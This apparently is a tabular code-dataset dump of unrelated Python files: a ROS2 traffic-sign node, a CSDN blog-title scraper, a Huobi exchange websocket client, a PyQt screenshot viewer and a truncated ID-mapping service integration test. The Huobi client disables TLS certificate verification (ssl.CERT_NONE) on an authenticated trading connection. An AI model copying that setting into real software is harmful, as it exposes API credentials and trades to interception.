source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
traffic_sign_node.py
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
traffic_sign_node.py
This module creates the traffic_sign_node which is responsible for collecting inference results
from object_detection_pkg and post-processing the signs.
After postprocessing this module provides a suggested directives based on detected signs.
The node defines:
inference_subscriber: A subscriber to the /object_detection_pkg/inference_results published
by the object_detection_pkg with inference data.
traffic_sign_publisher: A publisher that publishes directives based on detected signs.
"""
import time
import signal
import threading
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (
InferResultsArray,
TrafficSign,
TrafficLight,
TrafficMsg,
)
from traffic_sign_pkg import constants, utils, cv_utils
class TrafficSignNode(Node):
def __init__(self, qos_profile):
"""Create a ObjectDetectionNode."""
super().__init__("traffic_sign_node")
self.get_logger().info("traffic_sign_node started.")
# Double buffer to hold the input inference data.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Check if the inference output needs to be published to localhost using web_video_server
self.declare_parameter("PUBLISH_DISPLAY_OUTPUT")
self.publish_display_output = (
self.get_parameter("PUBLISH_DISPLAY_OUTPUT")
.get_parameter_value()
.bool_value
)
self.get_logger().info(f"Publish output set to {self.publish_display_output}")
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(
InferResultsArray,
constants.INFERENCE_RESULT_TOPIC,
self.on_inference_received_cb,
qos_profile,
)
# Creating publisher for display_image.
self.display_image_publisher = self.create_publisher(
Image, constants.DISPLAY_IMAGE_PUBLISHER_TOPIC, 10
)
# Publisher for detection results.
self.traffic_sign_publisher = self.create_publisher(
TrafficMsg, constants.TRAFFIC_SIGN_PUBLISHER_TOPIC, qos_profile
)
self.bridge = CvBridge()
# Launching a separate thread to run processing.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_detection)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(
f"Waiting for input data on {constants.INFERENCE_RESULT_TOPIC}"
)
def wait_for_thread(self):
"""Function which joins the created background thread."""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread."""
self.stop_thread = True
def on_inference_received_cb(self, inference_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
inference_data (InferResultsArray): Message containing inference results from object detection.
"""
self.input_buffer.put(inference_data)
def run_detection(self):
"""Method for running processing based on the received input data."""
try:
while not self.stop_thread:
# Get an input data from double buffer (InferResultsArray)
inference_results = self.input_buffer.get()
start_time = time.time()
# First get the input into a format we can work with.
image = self.bridge.imgmsg_to_cv2(inference_results.images[0])
results = inference_results.results # InferResults object
self.get_logger().info(
f"Got input data... Results: {len(inference_results.results)} Images: {len(inference_results.images)}"
)
# List of tuples (sign, value, approx_distance)
detected_signs = []
# List of tuples (color, approx_distance)
detected_traffic_lights = []
# Process each inference result object detected:
for res in results:
# First check detected label.
coco_label = constants.COCO_LABELS[res.class_label]
bounding_box = (
np.int(res.x_min),
np.int(res.y_min),
np.int(res.x_max),
np.int(res.y_max),
)
# TODO: Compute better approx distance metric.
max_bbox_size = image.shape[0] * image.shape[1]
bbox_size = (bounding_box[2] - bounding_box[0]) * (
bounding_box[3] - bounding_box[1]
)
# Smaller means closer.
distance_approximation = 1.0 - bbox_size / max_bbox_size
self.get_logger().info(f"Postprocessing {coco_label}")
if coco_label == "traffic light":
color = cv_utils.detect_traffic_light_color(image, bounding_box)
self.get_logger().info(f"Traffic detected -> {color}")
detected_traffic_lights.append((color, distance_approximation))
elif coco_label == "street sign":
detected_signs.append(
("street sign", -1.0, distance_approximation)
)
elif coco_label == "stop sign":
detected_signs.append(
("stop sign", 0.0, distance_approximation)
)
else:
self.get_logger().info(f"No logic for label {coco_label}")
traffic_message = TrafficMsg()
traffic_message.signs = []
traffic_message.lights = []
for (sign, value, distance_approximation) in detected_signs:
msg = TrafficSign()
msg.type = sign
msg.value = value
msg.distance = distance_approximation
traffic_message.signs.append(msg)
for (color, distance_approximation) in detected_traffic_lights:
msg = TrafficLight()
msg.type = "traffic light"
msg.color = color
msg.distance = distance_approximation
traffic_message.lights.append(msg)
# Always publish the message regardless of the number of detected signs:
# no signs is also valid road information.
self.traffic_sign_publisher.publish(traffic_message)
# TODO: Output debug data on top of input image.
if self.publish_display_output:
self.get_logger().info("Publishing display output")
display_image = image
# Publish to display topic (Can be viewed on localhost:8080).
display_image = self.bridge.cv2_to_imgmsg(
np.array(display_image), "bgr8"
)
self.display_image_publisher.publish(display_image)
self.get_logger().info(
f"Total execution time = {time.time() - start_time}"
)
except Exception as ex:
self.get_logger().error(f"Failed detection step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(
reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST,
)
try:
traffic_sign_node = TrafficSignNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
traffic_sign_node.get_logger().info("Signal Handler initiated")
traffic_sign_node.thread_shutdown()
traffic_sign_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(traffic_sign_node, executor)
except Exception as ex:
traffic_sign_node.get_logger().error(f"Exception in Traffic Sign Node: {ex}")
traffic_sign_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
traffic_sign_node.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
spider_blogtitle.py
|
__author__ = "Lucky"
## -*- coding:utf-8 -*-
# Get article Names from my CSDN blog
import urllib
import urllib2
import re,time
import threading
class Collector:
def __init__(self):
self.article_number = 0
self.article_name = []
def add(self, name):
self.article_number += 1
self.article_name.append(name)
return
collector = Collector()
class Spider:
def __init__(self):
self.siteURL = 'http://blog.csdn.net/luckyjoy521/article/list/'
self.hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 'Accept-Encoding': 'none', 'Accept-Language': 'en-US,en;q=0.8', 'Connection': 'keep-alive'}
def getPage(self, pageIndex):
url = self.siteURL + "" + str(pageIndex)
request = urllib2.Request(url, headers=self.hdr)
for i in range(1,4):
try:
response = urllib2.urlopen(request, timeout=8) #timeout
page = response.read()
print url
return page
except Exception, e:
time.sleep(8)
print str(e) + " Retry to " + url
print "Connection Failed to " + url
return ""
def getContent(self, pageIndex):
page = self.getPage(pageIndex)
#grep certain content
pattern = re.compile("(?<=link_title).*\n.*(?=\n)")
items = re.findall(pattern, page)
for item in items:
it = item.split("\n")
an = it[1].strip()
print an
collector.add(an)
#record page
f1 = file("page_" + str(pageIndex) + ".html", "w")
f1.write(page)
f1.close
return
def worker(index):
spd = Spider()
spd.getContent(index)
return
if __name__ == "__main__":
threads = []
for i in range(1,18):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.setDaemon(True) # So thread can be terminated by Ctrl+C
t.start()
for t in threads:
t.join(600)
print collector.article_number
|
websocketconnection.py
|
import threading
import websocket
import gzip
import ssl
import logging
from urllib import parse
import urllib.parse
from huobi.base.printtime import PrintDate
from huobi.constant.system import ApiVersion
from huobi.impl.utils.apisignaturev2 import create_signature_v2
from huobi.impl.utils.timeservice import get_current_timestamp
from huobi.impl.utils.urlparamsbuilder import UrlParamsBuilder
from huobi.impl.utils.apisignature import create_signature
from huobi.exception.huobiapiexception import HuobiApiException
from huobi.impl.utils import *
# Key: ws, Value: connection
websocket_connection_handler = dict()
def on_message(ws, message):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_message(message)
return
def on_error(ws, error):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_failure(error)
def on_close(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_close()
def on_open(ws):
websocket_connection = websocket_connection_handler[ws]
websocket_connection.on_open(ws)
connection_id = 0
class ConnectionState:
IDLE = 0
CONNECTED = 1
CLOSED_ON_ERROR = 2
def websocket_func(*args):
connection_instance = args[0]
connection_instance.ws = websocket.WebSocketApp(connection_instance.url,
on_message=on_message,
on_error=on_error,
on_close=on_close)
global websocket_connection_handler
websocket_connection_handler[connection_instance.ws] = connection_instance
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connecting...")
connection_instance.delay_in_second = -1
connection_instance.ws.on_open = on_open
connection_instance.ws.run_forever(sslopt={"cert_reqs": ssl.CERT_NONE})
connection_instance.logger.info("[Sub][" + str(connection_instance.id) + "] Connection event loop down")
if connection_instance.state == ConnectionState.CONNECTED:
connection_instance.state = ConnectionState.IDLE
class WebsocketConnection:
def __init__(self, api_key, secret_key, uri, watch_dog, request):
# threading.Thread.__init__(self)
self.__thread = None
self.__market_url = "wss://api.huobi.pro/ws"
self.__trading_url = "wss://api.huobi.pro/ws/" + request.api_version
self.__api_key = api_key
self.__secret_key = secret_key
self.request = request
self.__watch_dog = watch_dog
self.delay_in_second = -1
self.ws = None
self.last_receive_time = 0
self.logger = logging.getLogger("huobi-client")
self.state = ConnectionState.IDLE
global connection_id
connection_id += 1
self.id = connection_id
host = urllib.parse.urlparse(uri).hostname
if host.find("api") == 0:
self.__market_url = "wss://" + host + "/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
else:
self.__market_url = "wss://" + host + "/api/ws"
self.__trading_url = "wss://" + host + "/ws/" + request.api_version
if request.is_trading:
self.url = self.__trading_url
else:
self.url = self.__market_url
def in_delay_connection(self):
return self.delay_in_second != -1
def re_connect_in_delay(self, delay_in_second):
if self.ws is not None:
self.ws.close()
self.ws = None
self.delay_in_second = delay_in_second
self.logger.warning("[Sub][" + str(self.id) + "] Reconnecting after "
+ str(self.delay_in_second) + " seconds later")
def re_connect(self):
if self.delay_in_second != 0:
self.delay_in_second -= 1
self.logger.warning("In delay connection: " + str(self.delay_in_second))
else:
self.connect()
def connect(self):
if self.state == ConnectionState.CONNECTED:
self.logger.info("[Sub][" + str(self.id) + "] Already connected")
else:
self.__thread = threading.Thread(target=websocket_func, args=[self])
self.__thread.start()
def send(self, data):
#print("sending data :", data)
self.ws.send(data)
def close(self):
self.ws.close()
del websocket_connection_handler[self.ws]
self.__watch_dog.on_connection_closed(self)
self.logger.error("[Sub][" + str(self.id) + "] Closing normally")
def on_open(self, ws):
#print("### open ###")
self.logger.info("[Sub][" + str(self.id) + "] Connected to server")
self.ws = ws
self.last_receive_time = get_current_timestamp()
self.state = ConnectionState.CONNECTED
self.__watch_dog.on_connection_created(self)
if self.request.is_trading:
try:
if self.request.api_version == ApiVersion.VERSION_V1:
builder = UrlParamsBuilder()
create_signature(self.__api_key, self.__secret_key,
"GET", self.url, builder)
builder.put_url("op", "auth")
self.send(builder.build_url_to_json())
elif self.request.api_version == ApiVersion.VERSION_V2:
builder = UrlParamsBuilder()
create_signature_v2(self.__api_key, self.__secret_key,
"GET", self.url, builder)
self.send(builder.build_url_to_json())
else:
self.on_error("api version for create the signature fill failed")
except Exception as e:
self.on_error("Unexpected error when create the signature: " + str(e))
else:
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
return
def on_error(self, error_message):
if self.request.error_handler is not None:
exception = HuobiApiException(HuobiApiException.SUBSCRIPTION_ERROR, error_message)
self.request.error_handler(exception)
self.logger.error("[Sub][" + str(self.id) + "] " + str(error_message))
def on_failure(self, error):
self.on_error("Unexpected error: " + str(error))
self.close_on_error()
def on_message(self, message):
self.last_receive_time = get_current_timestamp()
if isinstance(message, (str)):
#print("RX string : ", message)
json_wrapper = parse_json_from_string(message)
elif isinstance(message, (bytes)):
#print("RX bytes: " + gzip.decompress(message).decode("utf-8"))
json_wrapper = parse_json_from_string(gzip.decompress(message).decode("utf-8"))
else:
print("RX unknow type : ", type(message))
return
if json_wrapper.contain_key("status") and json_wrapper.get_string("status") != "ok":
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("err-code") and json_wrapper.get_int("err-code") != 0:
error_code = json_wrapper.get_string_or_default("err-code", "Unknown error")
error_msg = json_wrapper.get_string_or_default("err-msg", "Unknown error")
self.on_error(error_code + ": " + error_msg)
elif json_wrapper.contain_key("op"):
op = json_wrapper.get_string("op")
if op == "notify":
self.__on_receive(json_wrapper)
elif op == "ping":
ping_ts = json_wrapper.get_string("ts")
self.__process_ping_on_trading_line(ping_ts)
elif op == "auth":
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
elif op == "req":
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("action"): # for V2
action_name = json_wrapper.get_string("action")
if action_name == "ping":
action_data = json_wrapper.get_object("data")
ping_ts = action_data.get_string("ts")
self.__process_ping_on_v2_trade(ping_ts)
elif action_name == "sub":
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("subscribe ACK received")
else:
logging.error("receive error data : " + message)
elif action_name == "req": #
action_code = json_wrapper.get_int("code")
if action_code == 200:
logging.info("signature ACK received")
if self.request.subscription_handler is not None:
self.request.subscription_handler(self)
else:
logging.error("receive error data : " + message)
elif action_name == "push":
action_data = json_wrapper.get_object("data")
if action_data:
self.__on_receive(json_wrapper)
else:
logging.error("receive error push data : " + message)
elif json_wrapper.contain_key("ch"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("rep"):
self.__on_receive(json_wrapper)
elif json_wrapper.contain_key("ping"):
ping_ts = json_wrapper.get_string("ping")
self.__process_ping_on_market_line(ping_ts)
else:
print("unknown data process, RX: " + gzip.decompress(message).decode("utf-8"))
def __on_receive(self, json_wrapper):
res = None
try:
if self.request.json_parser is not None:
res = self.request.json_parser(json_wrapper)
except Exception as e:
self.on_error("Failed to parse server's response: " + str(e))
try:
if self.request.update_callback is not None:
self.request.update_callback(res)
except Exception as e:
self.on_error("Process error: " + str(e)
+ " You should capture the exception in your error handler")
if self.request.auto_close:
self.close()
def __process_ping_on_trading_line(self, ping_ts):
#self.send("{\"op\":\"pong\",\"ts\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"op\":\"pong\",\"ts\":" + str(ping_ts) + "}")
return
def __process_ping_on_market_line(self, ping_ts):
#self.send("{\"pong\":" + str(get_current_timestamp()) + "}")
#PrintDate.timestamp_to_date(ping_ts)
self.send("{\"pong\":" + str(ping_ts) + "}")
return
def __process_ping_on_v2_trade(self, ping_ts):
# PrintDate.timestamp_to_date(ping_ts)
self.send("{\"action\": \"pong\",\"data\": {\"ts\": " + str(ping_ts) +"}}")
return
def close_on_error(self):
if self.ws is not None:
self.ws.close()
self.state = ConnectionState.CLOSED_ON_ERROR
self.logger.error("[Sub][" + str(self.id) + "] Connection is closing due to error")
|
screenshots.py
|
import logging
from threading import Thread
from typing import List
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIcon, QPixmap, QCursor
from PyQt5.QtWidgets import QDialog, QLabel, QPushButton, QVBoxLayout, QProgressBar, QApplication, QWidget, \
QSizePolicy, QHBoxLayout
from bauh.api.abstract.cache import MemoryCache
from bauh.api.http import HttpClient
from bauh.view.qt import qt_utils
from bauh.view.qt.components import new_spacer
from bauh.view.qt.thread import AnimateProgress
from bauh.view.qt.view_model import PackageView
from bauh.view.util.translation import I18n
class ScreenshotsDialog(QDialog):
def __init__(self, pkg: PackageView, http_client: HttpClient, icon_cache: MemoryCache, i18n: I18n, screenshots: List[QPixmap], logger: logging.Logger):
super(ScreenshotsDialog, self).__init__()
self.setWindowTitle(str(pkg))
self.screenshots = screenshots
self.logger = logger
self.loaded_imgs = []
self.download_threads = []
self.i18n = i18n
self.http_client = http_client
self.progress_bar = QProgressBar()
self.progress_bar.setObjectName('progress_screenshots')
self.progress_bar.setCursor(QCursor(Qt.WaitCursor))
self.progress_bar.setMaximumHeight(10 if QApplication.instance().style().objectName().lower() == 'windows' else 6)
self.progress_bar.setTextVisible(False)
self.thread_progress = AnimateProgress()
self.thread_progress.signal_change.connect(self._update_progress)
self.thread_progress.start()
# THERE ARE CRASHES WITH SOME RARE ICONS ( like insomnia ). IT CAN BE A QT BUG. IN THE MEANTIME, ONLY THE TYPE ICON WILL BE RENDERED
#
# icon_data = icon_cache.get(pkg.model.icon_url)
#
# if icon_data and icon_data.get('icon'):
# self.setWindowIcon(icon_data.get('icon'))
# else:
# self.setWindowIcon(QIcon(pkg.model.get_type_icon_path()))
self.setWindowIcon(QIcon(pkg.model.get_type_icon_path()))
self.setLayout(QVBoxLayout())
self.layout().addWidget(new_spacer())
self.img = QLabel()
self.img.setObjectName('image')
self.layout().addWidget(self.img)
self.layout().addWidget(new_spacer())
self.container_buttons = QWidget()
self.container_buttons.setObjectName('buttons_container')
self.container_buttons.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)
self.container_buttons.setContentsMargins(0, 0, 0, 0)
self.container_buttons.setLayout(QHBoxLayout())
self.bt_back = QPushButton(' < ' + self.i18n['screenshots.bt_back.label'].capitalize())
self.bt_back.setObjectName('back')
self.bt_back.setProperty('control', 'true')
self.bt_back.setCursor(QCursor(Qt.PointingHandCursor))
self.bt_back.clicked.connect(self.back)
self.container_buttons.layout().addWidget(self.bt_back)
self.container_buttons.layout().addWidget(new_spacer())
self.container_buttons.layout().addWidget(self.progress_bar)
self.container_buttons.layout().addWidget(new_spacer())
self.bt_next = QPushButton(self.i18n['screenshots.bt_next.label'].capitalize() + ' > ')
self.bt_next.setObjectName('next')
self.bt_next.setProperty('control', 'true')
self.bt_next.setCursor(QCursor(Qt.PointingHandCursor))
self.bt_next.clicked.connect(self.next)
self.container_buttons.layout().addWidget(self.bt_next)
self.layout().addWidget(self.container_buttons)
self.img_idx = 0
self.max_img_width = 800
self.max_img_height = 600
for idx, s in enumerate(self.screenshots):
t = Thread(target=self._download_img, args=(idx, s), daemon=True)
t.start()
self.resize(self.max_img_width + 5, self.max_img_height + 5)
self._load_img()
qt_utils.centralize(self)
def _update_progress(self, val: int):
self.progress_bar.setValue(val)
def _load_img(self):
if len(self.loaded_imgs) > self.img_idx:
img = self.loaded_imgs[self.img_idx]
if isinstance(img, QPixmap):
self.img.setText('')
self.img.setPixmap(img)
else:
self.img.setText(img)
self.img.setPixmap(QPixmap())
self.img.unsetCursor()
self.thread_progress.stop = True
self.progress_bar.setVisible(False)
else:
self.img.setPixmap(QPixmap())
self.img.setCursor(QCursor(Qt.WaitCursor))
self.img.setText('{} {}/{}...'.format(self.i18n['screenshots.image.loading'], self.img_idx + 1, len(self.screenshots)))
self.progress_bar.setVisible(True)
self.thread_progress.start()
if len(self.screenshots) == 1:
self.bt_back.setVisible(False)
self.bt_next.setVisible(False)
else:
self.bt_back.setEnabled(self.img_idx != 0)
self.bt_next.setEnabled(self.img_idx != len(self.screenshots) - 1)
def _download_img(self, idx: int, url: str):
self.logger.info('Downloading image [{}] from {}'.format(idx, url))
res = self.http_client.get(url)
if res:
if not res.content:
self.logger.warning('Image [{}] from {} has no content'.format(idx, url))
self.loaded_imgs.append(self.i18n['screenshots.download.no_content'])
self._load_img()
else:
self.logger.info('Image [{}] successfully downloaded'.format(idx))
pixmap = QPixmap()
pixmap.loadFromData(res.content)
if pixmap.size().height() > self.max_img_height or pixmap.size().width() > self.max_img_width:
pixmap = pixmap.scaled(self.max_img_width, self.max_img_height, Qt.KeepAspectRatio, Qt.SmoothTransformation)
self.loaded_imgs.append(pixmap)
if self.img_idx == idx:
self._load_img()
else:
self.logger.info("Could not retrieve image [{}] from {}".format(idx, url))
self.loaded_imgs.append(self.i18n['screenshots.download.no_response'])
self._load_img()
def back(self):
self.img_idx -= 1
self._load_img()
def next(self):
self.img_idx += 1
self._load_img()
|
service_test.py
|
from pytest import fixture
from jgikbase.idmapping.service.mapper_service import create_app
from jgikbase.test.idmapping import test_utils
from jgikbase.test.idmapping.mongo_controller import MongoController
from threading import Thread
from flask import request
from configparser import ConfigParser
import os
import tempfile
import shutil
import requests_mock
import requests
import logging
import time
import re
from jgikbase.test.idmapping.test_utils import assert_ms_epoch_close_to_now,\
assert_json_error_correct
from pymongo.mongo_client import MongoClient
from jgikbase.idmapping.storage.mongo.id_mapping_mongo_storage import IDMappingMongoStorage
from jgikbase.idmapping.core.user import Username, AuthsourceID, User
from jgikbase.idmapping.core.tokens import Token
from jgikbase.idmapping.core.object_id import NamespaceID
from jgikbase.idmapping.storage.id_mapping_storage import IDMappingStorage
import json
# These tests check that all the parts of the system play nice together. That generally means,
# per endpoint, one happy path test and one unhappy path test, where the unhappy path goes
# through as much of the stack as possible.
# The unit tests are responsible for really getting into the nooks and crannies of each class.
# Should test logging here...? Skip for now. Maybe add later.
VERSION = '0.1.1'
DB_NAME = 'test_db_idmapping_service_integration'
KBASE_URL = 'http://fake_url_for_mocking.com'
KBASE_ADMIN_ROLE = 'fake_role_for_mocking'
KBASE_TOKEN = 'fake_token_for_mocking'
def create_deploy_cfg(mongo_port):
cfg = ConfigParser()
cfg.add_section('idmapping')
cfg['idmapping']['mongo-host'] = 'localhost:' + str(mongo_port)
cfg['idmapping']['mongo-db'] = DB_NAME
cfg['idmapping']['authentication-enabled'] = 'local, kbase'
cfg['idmapping']['authentication-admin-enabled'] = 'local, kbase'
cfg['idmapping']['auth-source-kbase-factory-module'] = (
'jgikbase.idmapping.userlookup.kbase_user_lookup')
cfg['idmapping']['auth-source-kbase-init-token'] = KBASE_TOKEN
cfg['idmapping']['auth-source-kbase-init-url'] = KBASE_URL
cfg['idmapping']['auth-source-kbase-init-admin-role'] = KBASE_ADMIN_ROLE
_, path = tempfile.mkstemp('.cfg', 'deploy-', dir=test_utils.get_temp_dir(), text=True)
with open(path, 'w') as handle:
cfg.write(handle)
return path
@fixture(scope='module')
def mongo():
# remove any current handlers, since tests run in one process
logging.getLogger().handlers.clear()
mongoexe = test_utils.get_mongo_exe()
tempdir = test_utils.get_temp_dir()
wt = test_utils.get_use_wired_tiger()
mongo = MongoController(mongoexe, tempdir, wt)
print('running mongo {}{} on port {} in dir {}'.format(
mongo.db_version, ' with WiredTiger' if wt else '', mongo.port, mongo.temp_dir))
yield mongo
del_temp = test_utils.get_delete_temp_files()
print('shutting down mongo, delete_temp_files={}'.format(del_temp))
mongo.destroy(del_temp)
if del_temp:
shutil.rmtree(test_utils.get_temp_dir())
@fixture
def service_port(mongo):
mongo.clear_database(DB_NAME, drop_indexes=True)
os.environ['ID_MAPPING_CONFIG'] = create_deploy_cfg(mongo.port)
with requests_mock.Mocker() as m:
m.get('http://fake_url_for_mocking.com/',
request_headers={'Accept': 'application/json'},
json={'version': '0.1.2', 'gitcommithash': 'hashyhash', 'servertime': 3})
app = create_app()
# this is probably the dumbest thing I've ever seen
@app.route('/ohgodnothehumanity')
def kill():
request.environ.get('werkzeug.server.shutdown')()
return ('', 200)
portint = test_utils.find_free_port()
Thread(target=app.run, kwargs={'port': portint}).start()
time.sleep(0.05)
port = str(portint)
print('running id mapping service at localhost:' + port)
yield port
# shutdown the server
requests.get('http://localhost:' + port + '/ohgodnothehumanity')
def get_storage_instance(mongo) -> IDMappingStorage:
client = MongoClient('localhost:' + str(mongo.port))
return IDMappingMongoStorage(client[DB_NAME])
def test_root(service_port):
r = requests.get('http://localhost:' + service_port)
j = r.json()
time_ = j['servertime']
commit = j['gitcommithash']
del j['servertime']
del j['gitcommithash']
assert j == {'service': 'ID Mapping Service', 'version': VERSION}
assert re.match('[a-f\d]{40}', commit) is not None
assert_ms_epoch_close_to_now(time_)
assert r.status_code == 200
def test_create_and_get_namespace(service_port, mongo):
storage = get_storage_instance(mongo)
t = Token('foobar')
# fail to create a namespace
r = requests.put('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + t.token})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 401,
'httpstatus': 'Unauthorized',
'appcode': 10020,
'apperror': 'Invalid token',
'message': '10020 Invalid token'
}
})
assert r.status_code == 401
# succeed at creating a namespace
storage.create_local_user(Username('user1'), t.get_hashed_token())
storage.set_local_user_as_admin(Username('user1'), True)
r = requests.put('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + t.token})
assert r.status_code == 204
# get the namespace with a populated user list
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + t.token})
assert r.json() == {'namespace': 'myns', 'publicly_mappable': False, 'users': []}
assert r.status_code == 200
# fail getting a namespace
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns1')
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50010,
'apperror': 'No such namespace',
'message': '50010 No such namespace: myns1'
}
})
assert r.status_code == 404
def test_add_remove_user(service_port, mongo):
storage = get_storage_instance(mongo)
lut = Token('foobar')
storage.create_local_user(Username('lu'), lut.get_hashed_token())
storage.set_local_user_as_admin(Username('lu'), True)
storage.create_namespace(NamespaceID('myns'))
# add a user
# tests integration with all parts of the kbase user handler
with requests_mock.Mocker(real_http=True) as m:
m.get(KBASE_URL + '/api/V2/token', request_headers={'Authorization': 'mytoken'},
json={'user': 'u1', 'expires': 4800, 'cachefor': 5600})
m.get(KBASE_URL + '/api/V2/me', request_headers={'Authorization': 'mytoken'},
json={'customroles': [KBASE_ADMIN_ROLE]})
m.get(KBASE_URL + '/api/V2/users/?list=imauser',
request_headers={'Authorization': KBASE_TOKEN},
json={'imauser': 'im totally a user omg'})
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'kbase mytoken'})
assert r.status_code == 204
# check the user is there
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + lut.token})
assert r.json() == {'namespace': 'myns',
'publicly_mappable': False,
'users': ['kbase/imauser']}
# fail adding the same user. The KBase info is cached now so we don't need to mock it again
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'kbase mytoken'})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 400,
'httpstatus': 'Bad Request',
'appcode': 40000,
'apperror': 'User already exists',
'message': ('40000 User already exists: User kbase/imauser already ' +
'administrates namespace myns')
}
})
assert r.status_code == 400
# remove the user using a local admin
r = requests.delete('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'local ' + lut.token})
assert r.status_code == 204
# check the user is gone
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace/myns',
headers={'Authorization': 'local ' + lut.token})
assert r.json() == {'namespace': 'myns', 'publicly_mappable': False, 'users': []}
# fail removing the user with a kbase admin
r = requests.delete('http://localhost:' + service_port +
'/api/v1/namespace/myns/user/kbase/imauser',
headers={'Authorization': 'kbase mytoken'})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50000,
'apperror': 'No such user',
'message': ('50000 No such user: User kbase/imauser does not ' +
'administrate namespace myns')
}
})
assert r.status_code == 404
def test_set_public_and_list_namespaces(service_port, mongo):
storage = get_storage_instance(mongo)
lut = Token('foobar')
u = Username('lu')
storage.create_local_user(u, lut.get_hashed_token())
priv = NamespaceID('priv')
storage.create_namespace(priv)
storage.add_user_to_namespace(priv, User(AuthsourceID('local'), u))
storage.set_namespace_publicly_mappable(priv, True)
pub = NamespaceID('pub')
storage.create_namespace(pub)
storage.add_user_to_namespace(pub, User(AuthsourceID('local'), u))
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/priv/set?publicly_mappable=false',
headers={'Authorization': 'local ' + lut.token})
assert r.status_code == 204
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/pub/set?publicly_mappable=true',
headers={'Authorization': 'local ' + lut.token})
assert r.status_code == 204
r = requests.get('http://localhost:' + service_port + '/api/v1/namespace')
assert r.json() == {'publicly_mappable': ['pub'], 'privately_mappable': ['priv']}
r = requests.put('http://localhost:' + service_port +
'/api/v1/namespace/missing/set?publicly_mappable=false',
headers={'Authorization': 'local ' + lut.token})
assert_json_error_correct(
r.json(),
{'error': {'httpcode': 404,
'httpstatus': 'Not Found',
'appcode': 50010,
'apperror': 'No such namespace',
'message': '50010 No such namespace: missing'
}
})
assert r.status_code == 404
def test_mapping(service_port, mongo):
storage = get_storage_instance(mongo)
lut = Token('foobar')
u = Username('lu')
storage.create_local_user(u, lut.get_hashed_token())
priv = NamespaceID('priv')
storage.create_namespace(priv)
storage.add_user_to_namespace(priv, User(AuthsourceID('local'), u))
pub = NamespaceID('pub')
